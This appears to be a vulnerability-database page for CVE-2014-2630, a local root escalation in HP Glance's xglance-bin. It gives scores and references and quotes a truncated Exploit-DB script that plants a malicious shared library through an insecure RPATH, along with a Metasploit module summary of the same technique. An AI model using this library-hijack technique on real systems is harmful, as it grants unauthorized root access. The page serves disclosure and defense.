CVE-2014-2630
published 2014-08-12CVE-2014-2630: Unspecified vulnerability in HP Operations Agent 11.00, when Glance is used, allows local users to gain privileges via unknown vectors.
PriorityP431medium4.4CVSS 2.0
AVLACMAuNCPIPAP
EXPLOIT
EPSS
7.08%
93.4th percentile
Unspecified vulnerability in HP Operations Agent 11.00, when Glance is used, allows local users to gain privileges via unknown vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | operations_agent | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
xglance-bin 11.00 - Privilege Escalation
exploitdb·2020-02-05·CVSS 4.4
CVE-2014-2630 [MEDIUM] xglance-bin 11.00 - Privilege Escalation
xglance-bin 11.00 - Privilege Escalation
---
# Exploit Title: xglance-bin 11.00 - Privilege Escalation
# Exploit Author: Robert Jaroszuk and Marco Ortisi (RedTimmy Security)
# Date: 2020-02-01
# Tested on: RHEL 5.x/6.x/7.x/8.x
# CVE: CVE-2014-2630
# Disclamer: This exploit is for educational purpose only
# More details on https://redtimmysec.wordpress.com/2020/02/04/perf-exploiter/
#
#!/bin/sh
echo "[*] Hewlett-Packard Performance Monitoring for Open System Environments exploit by Robert Jaroszuk and Marco Ortisi (RedTimmy Security)"
echo
echo "[+] Preparing the code..."
cat > lib.c
#include
#include
#include
#include
void __cxa_finalize (void *d) {
return;
}
void __attribute__((constructor)) init() {
setresuid(geteuid(), geteuid(), geteuid());
printf("Hewlett-Packard Performance Mo
Metasploit
HP Performance Monitoring xglance Priv Esc
metasploit
HP Performance Monitoring xglance Priv Esc
HP Performance Monitoring xglance Priv Esc
This exploit takes advantage of xglance-bin, part of HP's Glance (or Performance Monitoring) version 11 'and subsequent' , which was compiled with an insecure RPATH option. The RPATH includes a relative path to -L/lib64/ which can be controlled by a user. Creating libraries in this location will result in an escalation of privileges to root.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/156206/xglance-bin-Local-Root-Privilege-Escalation.htmlhttp://packetstormsecurity.com/files/157528/HP-Performance-Monitoring-xglance-Privilege-Escalation.htmlhttp://seclists.org/fulldisclosure/2020/Feb/1http://secunia.com/advisories/60041http://www.securitytracker.com/id/1030702https://exchange.xforce.ibmcloud.com/vulnerabilities/95181https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04394554https://seclists.org/bugtraq/2020/Feb/7http://packetstormsecurity.com/files/156206/xglance-bin-Local-Root-Privilege-Escalation.htmlhttp://packetstormsecurity.com/files/157528/HP-Performance-Monitoring-xglance-Privilege-Escalation.htmlhttp://seclists.org/fulldisclosure/2020/Feb/1http://secunia.com/advisories/60041http://www.securitytracker.com/id/1030702https://exchange.xforce.ibmcloud.com/vulnerabilities/95181https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04394554https://seclists.org/bugtraq/2020/Feb/7
2014-08-12
Published